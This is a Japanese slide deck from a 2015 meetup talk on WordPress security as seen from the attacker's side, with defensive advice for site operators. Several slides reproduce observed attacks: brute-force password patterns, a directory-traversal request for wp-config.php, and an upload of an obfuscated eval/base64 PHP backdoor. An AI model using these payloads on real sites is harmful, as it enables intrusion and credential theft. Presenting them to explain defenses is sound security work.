攻撃者からみたWordPressセキュリティ

1. 攻撃者からみた
WordPressセキュリティ
@ym405nm
さくらのビアバッシュ in 元町 D.E.P.
2015/03/19
加筆修正 : 2015/03/20

2. 目次
•現状
•攻撃者を勝手にプロファイリング
•運用者の対策
•まとめ
•おまけ？

3. 現状

4. 現状
• 2013年9月 ロリポップの WordPress が一斉に改
ざんされる
• 約8,000件のサイトが
被害に
• サイト名が
「Hacked by Krad Xin」
等に改ざん

5. 現状
• 2015年3月複数のサイトが改ざん
※ タイポ修正ｗ
http://www3.nhk.or.jp/news/html/20150311/k10010011751000.html

6. 攻撃者を勝手にプロファイリング

7. 誰がやってるのか？
• ハクティビスト
• 政治的主張など、自分たちの主張を通すためにサイトを
改ざんする
• 改ざんしたものを目立つようにアピールする
• マルウェア配布者
• 難読化したスクリプトなどを仕込み訪問者にマルウェア
感染させる
• 標的型攻撃者グループ
• 使用するマルウェアのホスティングとして使用する
• C&Cサーバとして使用する

8. なぜ攻撃者がWordPressを狙うのか
• 圧倒的なユーザ数
• 行き届かないユーザ管理
• 100人以上の編集者を抱えるサイト
• 編集者、管理者の面識がほとんどないサイト
• サードパーティ製ソフトウェアの普及
• テーマやプラグイン
• セキュリティレベルはそれぞれの開発者に依存する

9. どのように狙われているのか
• 攻撃者は弱そうな WordPress を狙っている
• wp-content?
• wp-admin?
• 脆弱なソフトウェアを使用しているサイトを探す
• メーリングリスト
• 脆弱性売買サイト
※ただし WordPress 関連の脆弱性は
無料で配布されていることが多い
データを集めてみた

10. どのように狙われているのか
10
攻撃者
WP WP WP
BOT
サイトとか
Proxy Proxy Proxy ログ解析
投稿
収集
攻撃/スキャン
送信

11. こんなサイトです

12. こういうふうに攻撃してくるゾ
• アカウントクラッキング
• wp-config.php 情報の窃取
• ファイルアップロード

13. こういうふうに攻撃してくるゾ
試行パスワード 回数
[server-name]123456 96
[server-name]123 49
[server-name][server-name] 48
[server-name]000000 48
[server-name]111 48
[server-name]111111 48
[server-name]1234 48
[server-name]12345 48
[server-name]12345678 48
[server-name]123abc 48
[server-name]222 48
[server-name]222222 48
[server-name]333 48
[server-name]444 48
[server-name]555 48
[server-name]555555 48
[server-name]666 48
[server-name]666666 48
※ 2014年3月～5月計測
傾向は期間によって若干異なります

14. こういうふうに攻撃してくるゾ
POST /wp-content/themes/(THEME)/dl-skin.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux amd64) AppleWebKit/534.36 (KHTML, like Gecko)
Chrome/13.0.766.0 Safari/534.36
Host: server
Accept-Encoding: gzip
Referer: http://server/wp-content/themes/ (THEME) /dl-skin.php
Accept-Charset: utf-8,windows-1251;q=0.7,*;q=0.6
Accept-Language: en-us,en;q=0.8
Keep-Alive: 300
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.4
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
( PARAM )=..%2F..%2F..%2F..%2F..%2Fwp-config.php
ディレクトリトラバーサルの脆弱性を使用して
wp-config.php の内容を読み取ろうとしている

15. こういうふうに攻撃してくるゾ
Content-Disposition: form-data; name="Filedata"; filename="ifire.php"
Content-Type: text/plain
<?php
eval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX5FBk
RxZn0f6q3Gcs+2Ys/abIVOPpfXmRTXvz5R4hjYd08eetcBFr0pQjoAYzFmIynUXP1twBDkLIVp
9ku+c7Gx5lyEF*******sO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d
1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ==")));
?>
既知のファイルアップロード機能に認証がない脆弱性を使用して
PHPファイルをアップロードしようとしている
アップロードされたファイルは
バックドア（攻撃者専用の裏口）として動作する

16. 運用者の対策

17. 運用者の対策
• アカウントの管理をしっかりする
• パスワードは強度なものにする
• テーマ / プラグインの選定をする
• メンテナンス頻度
• 脆弱性情報への対応頻度
• 不要なものは使用しない
• セキュリティ拡張機能やセキュリティアプライアン
スの導入を検討する
• セキュリティ関連のプラグインに脆弱性があることも…

18. 運用者の対策
• あわせて対策したい
• サーバの選定
• ログの確認（ログイン履歴、アクセスログ）
• 脆弱性情報の収集

19. まとめ

20. まとめ
• 今後もWordPressに対する攻撃は減らない
• 攻撃者は既知のテーマ / プラグインの脆弱性を使
用することが多い
• アカウントの管理や、テーマ / プラグインの管理
をしっかりとする
安全なWordPressライフを！

21. ご清聴ありがとうございました
• Contact
Mail : y-matsumoto@kdl.co.jp
Twitter : ym405nm
Facebook : facebook.com/ym405nm